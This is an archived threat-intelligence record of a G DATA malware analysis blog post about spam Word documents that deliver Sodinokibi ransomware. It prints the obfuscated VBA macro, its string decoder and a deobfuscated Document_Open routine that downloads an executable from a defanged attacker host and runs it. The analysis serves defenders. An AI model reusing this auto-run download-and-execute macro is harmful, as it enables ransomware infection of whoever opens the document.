{
	"id": "747da90e-9e91-4a26-9ae5-1dc6949a1b8f",
	"created_at": "2026-04-06T00:15:42.347822Z",
	"updated_at": "2026-04-10T13:13:05.537879Z",
	"deleted_at": null,
	"sha1_hash": "3b2724de56b7cdc385197876d7315569315b3458",
	"title": "Sodinokibi Spam, CinaRAT, and Fake G DATA Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 52037,
	"plain_text": "Sodinokibi Spam, CinaRAT, and Fake G DATA Blog\r\nBy Karsten Hahn\r\nPublished: 2019-06-05 · Archived: 2026-04-05 13:06:35 UTC\r\nMost of the Macro code in the document looks innocent and is there to divert from the malicious code, which\r\nexecutes on Document_Open. The obfuscated VBA code uses long scrambled variable and function/sub names,\r\nencoded strings, junk parameters and conditions. The unaltered main code is below.\r\nSub docUmeNt_opeN()\r\nAïöJV39ª(0) = \"TwPgELNvMievP,~H\"\r\nAïöJV39ª(1) = \"S3v]hZFNe?N6l@fil?K9.J\\@ANT2p)Y_pIo5lel2iL7jc4Zqav_utuJpi=^ho}4+ndG0\"\r\nçê½Iâ¿® = ®M¿rº¥»¬¢(üDFW´³©¥nhEcu¬·Ñé(Z®»6û«¿KWiæ¬·(0, -6491, -6012))) + üDFW´³©¥nhEcu¬·Ñé(\"\\j/?MtxaiT_ycD.pr\r\nCall NqBHp7qCwNnGUYNUeNUrpXNqBHp7qCwNnGUYNUeNUrpXVpyNeGEx8cxyXNqBHp7qCwNnGUYNUeNUrpXVpyNwqBwFxjyXqyXNqBHp7qCwNnG\r\nCreateObject(üDFW´³©¥nhEcu¬·Ñé(Z®»6û«¿KWiæ¬·(1, 5279, -6017))).Open (çê½Iâ¿®)\r\nEnd Sub\r\nThe string decoding function simply extracts every fourth letter from the string. Below is the deobfuscated\r\ndecoding function.\r\nFunction DecodeString(EncodedString) As String\r\n Dim SomeByteArray(1055) As Byte, AnotherByteArray() As Byte\r\n AnotherByteArray = StrConv(EncodedString, 128) ' vbFromUnicode\r\n For idx = 0 To UBound(AnotherByteArray) - 1\r\n If (idx Mod 4 = 0) Then\r\n SomeByteArray(arrayIndex) = AnotherByteArray(idx)\r\n arrayIndex = arrayIndex + 1\r\n End If\r\n Next idx\r\n DecodeString = Left(StrConv(SomeByteArray, 64), arrayIndex) ' 64 = vbUnicode\r\nEnd Function\r\nThe main code downloads Sodinokibi to TEMP\\Microsoft-Word.exe and executes it. 
It looks as follows after\r\ndeobfuscation.\r\nSub Document_Open()\r\n DownloadedFilePath = Environ(\"TEMP\") + \"\\Microsoft-Word.exe\"\r\n Call DownloadToFile(0, \"hxxp://blaerck.xyz/sabo.exe\", DownloadedFilePath, 0, 0)\r\n CreateObject(\"Shell.Application\").Open (DownloadedFilePath)\r\nEnd Sub\r\nThe downloaded file is this Sodinokibi version[3].\n\nSource: https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data"
	],
	"report_names": [
		"31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data"
	],
	"threat_actors": [],
	"ts_created_at": 1775434542,
	"ts_updated_at": 1775826785,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.pdf",
		"text": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.txt",
		"img": "https://archive.orkl.eu/3b2724de56b7cdc385197876d7315569315b3458.jpg"
	}
}